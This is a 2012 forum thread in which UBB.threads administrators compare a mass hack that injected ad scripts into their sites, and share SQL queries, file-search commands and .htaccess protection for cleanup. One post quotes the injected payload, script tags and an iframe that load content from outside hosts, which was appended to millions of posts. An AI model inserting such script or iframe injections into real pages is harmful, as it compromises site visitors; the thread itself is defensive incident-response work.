|
Joined: Jan 2012
Posts: 95
journeyman
|
journeyman
Joined: Jan 2012
Posts: 95 |
Unwanted Google Ads started appearing in threads on our forum this morning. Is the a hacker or what? Pondboss Forum
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Yeah, we've got the same thing in ours. I thought it was simply because we hadn't updated, but since you're running 7.5.6p2, I can only assume it's not just unpatched versions...
I don't have time to really dig into this for a few hours, but so far in my cursory overview it doesn't look like any of the static files have been altered (at least the mod dates haven't been changed...)
Personally I was hoping to roll back to backup, but it looks like the ads pre-date last night's backup and I don't want to roll back and lose an entire day if possible.
Last edited by bakerzdosen; 08/26/2012 10:10 AM.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
I kind of thought that it might be malicious code stuck into the templates, but I'm just not seeing any indication that it is...
One interesting tidbit is that ads aren't showing up in our restricted forums, so obviously it couldn't be a site wide template modification.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
OK, I found a .js file in our files directory that was being included in all new posts. I've still got to get to the bottom of this, but it looks like the same google ad customer hit both of our sites. google_ad_client="ca-pub-9610313674109446" On your site, try getting rid of the http://forums.pondboss.com/templates/xx.js file. That'll be a quick fix, but not a permanent one.
|
|
|
|
Joined: Jan 2012
Posts: 95
journeyman
|
journeyman
Joined: Jan 2012
Posts: 95 |
The ads are showing up in most all of our old threads as well. Also some signatures have the same problem.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
I did report the abuse to google...
It does look like that file is still there on your site. Is there a reason you haven't removed or renamed it?
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
Just thought I'd pop in here, this appears to be a pretty large scale hack as they are targeting a large number of sites. At least 5 that I know of. Unsure of actual exploitable issue just yet, but since it seems to be happening on even patched versions, there is definitely some type of security issue they have found.
All the ones I have found have been an ads.js file, and it's either been in the gallery directory or in the templates/default directory.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Good to know Rick. Let me know if there is any info I can get to you about ours.
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
It's actually inserting the script call into the database as well, so when you pull up a post, the script call will be in there even after the exploit has been removed. What is odd on this part is its only putting it into the POST_BODY field, not the POST_DEFAULT_BODY, so it doesn't seem it's being inserted via the normal add post method.
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
I'd also check your forum/includes directory...on 4 of the sites there has been an exploit script in there, title of 2011.php
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Oh yeah, absolutely. Removing that script is a hack that simply gets rid of the ads. It doesn't do anything else.
Someone could come back and do exactly what they did before and we'd still have our pants down.
I would recommend people report this to google so that the people that did this don't get paid...
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
Well, two of the sites I have worked on, every post in the database was modified, several million, adding this to the end of the POST_BODY field:
<script src=http://snipershide.com/wp-content/texashunting.js></script><br /><script src=http://snipershide.com/wp-content/texashunting.js></script><script src=http://snipershide.com/wp-content/texashunting.js></script><br /><iframe src=http://forums.weddingbells.ca/tmp/index.html width=750 height=110></iframe>
It's a somewhat easy cleanup with a mysql replace, but it takes quite awhile. Anyone with this issue, I'd look at your ubbt_POSTS table, specifically at the POST_BODY field. It won't show up when editing the post, because the POST_DEFAULT_BODY field isn't altered, so you'll need to use some type of mysql tool.
Quick way to check would be to run the following SQL:
select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
For those reading this, I think you want to add a % to the end of that select statement for it to work: eg: select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%' Anybody want to give me a primer on mysql replace? Sweeping changes like that make me nervous. Especially with statements like this in the docs: Currently, you cannot replace into a table and select from the same table in a subquery. Is it really as simple as "update ubbt_POSTS set POST_BODY = replace(POST_BODY, '<script src=http://[path/to/inserted/jsfile]></script>', '');"?
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Personally, I'm thinking of just not allowing "attachment uploads" until this is resolved... That would prevent the uploading of the .js files, but I'm not sure how they were able to inject the code into the database to begin with. That is obviously what worries me.
|
|
|
|
Joined: Jun 2006
Posts: 16,366 Likes: 126
|
Joined: Jun 2006
Posts: 16,366 Likes: 126 |
I talked with SD and a temporary "patch" could be to just take and use htpasswd on your admin directory so that the users with elevated permissions cannot access your control panel without knowing the password to it. To do this, create a .htaccess file in the admin directory containing: # Start Authentication
AuthUserFile /path/to/a/file/named/.htpasswd
AuthType Basic
AuthName "UBB.Threads Control Panel"
Require valid-user
The file named .htpasswd should be under your web root (not accessible via your website) and needs to contain a user:encryptedpassword combination, one line per user (have multiple authorized admin's, you can choose to share a password or have everyone have a different password, whatever); to generate an encoded crypt hash click here. An example would be: gizmo:$1$3GfCWBPT$CIHAQSPgI9Y772j2CySul0
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Cool, thanks Gizmo. I'm about to run the code I mentioned above on our DB. I did a quick dump/load into my test system and it appears that it ran OK (and really not as long as I would have expected:) mysql> update ubbt_POSTS set POST_BODY = replace(POST_BODY, '[code they inserted]', ''); Query OK, 789195 rows affected (3 min 25.85 sec) Rows matched: 789343 Changed: 789195 Warnings: 0
mysql> select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%' -> ; +----------+ | count(*) | +----------+ | 0 | +----------+ 1 row in set (13.15 sec) Unfortunately, my test(home) server is probably faster than the "production" server, but even 5 minutes ain't bad for 789k rows IMHO. Here goes nothing.
Last edited by bakerzdosen; 08/26/2012 5:16 PM.
|
|
|
|
Joined: Jan 2004
Posts: 2,474 Likes: 3
Pooh-Bah
|
Pooh-Bah
Joined: Jan 2004
Posts: 2,474 Likes: 3 |
Good luck mate, waiting to hear of your results...
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
Whoops, missed that trailing %, yeah. So, the one site I was working on they had uploaded the 2011.php script into the forums tmp/ directory. This script was being called externally for modifying the database rows. Still not sure how they got the file into there in the first place at this point.
Same file was found on two other servers, one in the includes directory and one in a directory completely outside the forum.
Last edited by Rick; 08/26/2012 5:52 PM.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Holy cow, maybe it's not faster at home. (I'm sure the fact that the "production" db is used more and well cached had something to do with this: ) Query OK, 789195 rows affected (1 min 56.18 sec) Rows matched: 789359 Changed: 789195 Warnings: 0 HOWEVER, I actually had to reboot the stupid server (oh well, 441 days of uptime later...) because apache died on me while the sql statement was running and wouldn't start up again because 'something' was already listening on port 80. So, my advice is that if you want to avoid the risk of a reboot, stop apache while you run the sql replace command. Now to put on the .htpasswd file and I'll call it a day.
Last edited by bakerzdosen; 08/26/2012 5:54 PM.
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
For those that have SSH access to their server and want to get an idea of any files being modified or added that shouldn't have been, you can run this inside your public_html directory or your forums directory if you want to isolate it more:
find . -printf '%T@ %c %p\n' | sort -k 1n,1 -k 7 | cut -d' ' -f2- | grep 2012 | grep Aug
This will show you all files that have been modified in August. It could be a big list, but the most recently modified files will be at the bottom. This is how I found the 2011.php file.
Last edited by Rick; 08/26/2012 6:09 PM.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Gizmo,
Just a side note: You probably want to mention that the following should be in your apache config:
AllowOverride AuthConfig
I had to do that for ours as I wasn't using that config value until today.
Good luck to everyone dealing with this.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
For those that have SSH access to their server and want to get an idea of any files being modified or added that shouldn't have been, you can run this inside your public_html directory or your forums directory if you want to isolate it more:
find . -printf '%T@ %c %p\n' | sort -k 1n,1 -k 7 | cut -d' ' -f2- | grep 2012 | grep Aug
This will show you all files that have been modified in August. It could be a big list, but the most recently modified files will be at the bottom. This is how I found the 2011.php file. I found this works better as most of mine were sessions: find . -printf '%T@ %c %p\n' | sort -k 1n,1 -k 7 | cut -d' ' -f2- | grep 2012 | grep Aug | grep -v sessions
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
I had sessions in there, until I just found a bad file in the sessions directory on the last site I worked on So, you might want to at least scan that to make sure it's only session files in that directory.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Touché... Good point. Mine were all sessions, and I'm totally self-centered.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
I'd also check your forum/includes directory...on 4 of the sites there has been an exploit script in there, title of 2011.php Oh, I forgot to mention, my file was named admin_2011.php. I was just assuming that was it simply by your description, so I moved it. Is there an easy way to prevent .php files from being uploaded to the includes directory? I'm tempted to just run an rm *.php on that directory every minute if not.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
OK, one more thing: Here's the link to report these guys for your site: http://support.google.com/adsense/b...s.cs&ts=1190500&ctx=as2&rd=1Select "An AdSense violation regarding the content of a website or AdSense ad placement on a website" and then "Yes" Then, the option appears for "Ad code that has been placed on your site without your permission" I just added the contents of the .js file to this page which should be enough because it has their unique id in it.
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
No real way to prevent them from being uploaded. I've seen them uploaded to any writable directory. It appears they've found some way to exploit one of the scripts that is allowing them to get files uploaded into any directory as long as it's writable by the webserver.
Normally I can track this type of thing down by looking at the timestamp of the uploaded file and comparing it to the access logs to see what script was being accessed at that time, but every one I've worked on today has had their access logs turned off, so no luck.
|
|
|
|
Joined: Jan 2012
Posts: 95
journeyman
|
journeyman
Joined: Jan 2012
Posts: 95 |
I did rename the xx.js file and that has kept the ads off our forum since I did it. Thanks for the tip!
Since we don't have a programmer or database guy, I am waiting for a canned fix and patch so it doesn't happen again.
|
|
|
|
Joined: Dec 2006
Posts: 1
stranger
|
stranger
Joined: Dec 2006
Posts: 1 |
I found a new file in the ubb_js/ folder. the name of the file was our domain (minus the .com) + .js
I still need to figure out what is calling it (ie. maybe the posts) but for now, I'm just deleting the data from the file.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
Yup. That was the name of our .js file...
And chances are its the same thing calling it (the posts). Read through the rest of the posts for SQL to verify it.
Last edited by bakerzdosen; 08/27/2012 11:40 AM.
|
|
|
|
Joined: Sep 2007
Posts: 6
stranger
|
stranger
Joined: Sep 2007
Posts: 6 |
In case this helps anyone:
Our admin found an entry point in the templates folder: admin.php
He removed it, verified the folder permissions, and emptied the javascript file that was injected.
He traced the injection IP to 118.253.10.255
We sent an email to abuse.szx@2118.com.cn, which is where that IP traced to, and then did the Google Adwords abuse report.
|
|
|
|
Joined: Dec 2003
Posts: 6,628 Likes: 85
|
Joined: Dec 2003
Posts: 6,628 Likes: 85 |
Okay I will be the devils advocate. More details are needed.
Not all of the users here have stated what version they currently are using nor if they have installed the latest patch. I noticed at least one is not on a current patch. Also even if you are using the current patch. What did you do to clean up your existing files. Meaning did the intrusion happen after installation of the patch or before? Just because you just noticed it does not mean it was not there before.
I personally have not been hacked. But it seems to me. That more info is needed to determine what actually is going on.
For example I don't see evidence here that it happened. So why?
Blue Man Group There is no such thing as stupid questions. Just stupid answers
|
|
|
|
Joined: Jun 2006
Posts: 106
member
|
member
Joined: Jun 2006
Posts: 106 |
There could very well be something else besides UBB that's the entry point.
I'd like to know where the affected boards are hosted and more info on the servers and what else is on them. e.g. mysql, php, apache versions, do these affected sites also have wordpress, drupal, etc using the same database, etc.
|
|
|
|
Joined: Dec 2003
Posts: 6,628 Likes: 85
|
Joined: Dec 2003
Posts: 6,628 Likes: 85 |
There could very well be something else besides UBB that's the entry point.
I'd like to know where are the affected boards are hosted and more info on the servers and what else is on them. e.g. mysql, php, apache versions, is do these affected sites also have wordpress, drupal, etc using the same database, etc. Ageed. Till some official investigation is performed. How do we know. Crisis management is not the way to approach this. Even though the users impacted by this have a high level of urgency. BTW, Happy Birthday!
Blue Man Group There is no such thing as stupid questions. Just stupid answers
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
Of the 7 sites I've worked on, 3 of them are on all separate servers, with the latest patch, and the forums are the only thing on each server. So, I can't vouch for the other 4, as there are wordpress installs, other websites, etc. But the 3 sites, they are specifically forums only with no other websites. 2 servers have cPanel, and the other is just bare bones, no cpanel.
All 3 servers running centOs, updated versions, mysql, apache, etc.
If I can find any relative info on how it's happening, I surely post. I've just been playing cleanup on these sites since yesterday. First report was on Saturday evening, and then other reports throughout the day yesterday.
Last edited by Rick; 08/27/2012 3:47 PM.
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
OK, here's ours:
CentOS running on "bare metal" (now fully patched, but it wasn't before - it'd been a few months) mysql, apache. Nothing else running on the server (OK, ssh is running, but I've tried to lock it down as best I could, but I would bet that there is at least one thing running on there that shouldn't be. I'm just more of a Solaris guy.) No cPanel (ugh) or other crutches.
7.5.6 (no patches - yeah, I've gotta get on that. Supposedly we've paid our annual support but no one can find that number. I've just been too busy to track it down - For example, I'm in a hotel room 1500 miles from my last post in this thread...)
If there is any other info that would be helpful to provide, let me know.
|
|
|
|
Joined: Mar 2007
Posts: 522
Addict
|
Addict
Joined: Mar 2007
Posts: 522 |
I thought the patch was available to anyone, regardless of renewal status, but I could be wrong.
Steve
UBB.classic from 2000-2003 UBB.threads from 2003-present!
|
|
|
|
Joined: Mar 2007
Posts: 522
Addict
|
Addict
Joined: Mar 2007
Posts: 522 |
I just looked at the dates involved, and my subscription was expired when I downloaded the p1 and p2 patches.
Steve
UBB.classic from 2000-2003 UBB.threads from 2003-present!
|
|
|
|
Joined: Sep 2008
Posts: 82
journeyman
|
journeyman
Joined: Sep 2008
Posts: 82 |
NopeUnless it's changed since I asked.
|
|
|
|
Joined: Jan 2012
Posts: 95
journeyman
|
journeyman
Joined: Jan 2012
Posts: 95 |
We have a dedicated server at Hostway (SiteControl) with all the latest versions of everything. The server was setup new and the forum was migrated there a few months ago. The server is dedicated to our forums and there is nothing else running on it.
One of your guys upgraded us to 7.5.6p2 a few months ago. Brooks got us a quote and arranged to get the job done. I am not sure who did the actual work. Should be perfect, right?
|
|
|
0 members (),
1,448
guests, and
60
robots. |
Key:
Admin,
Global Mod,
Mod
|
|
|
|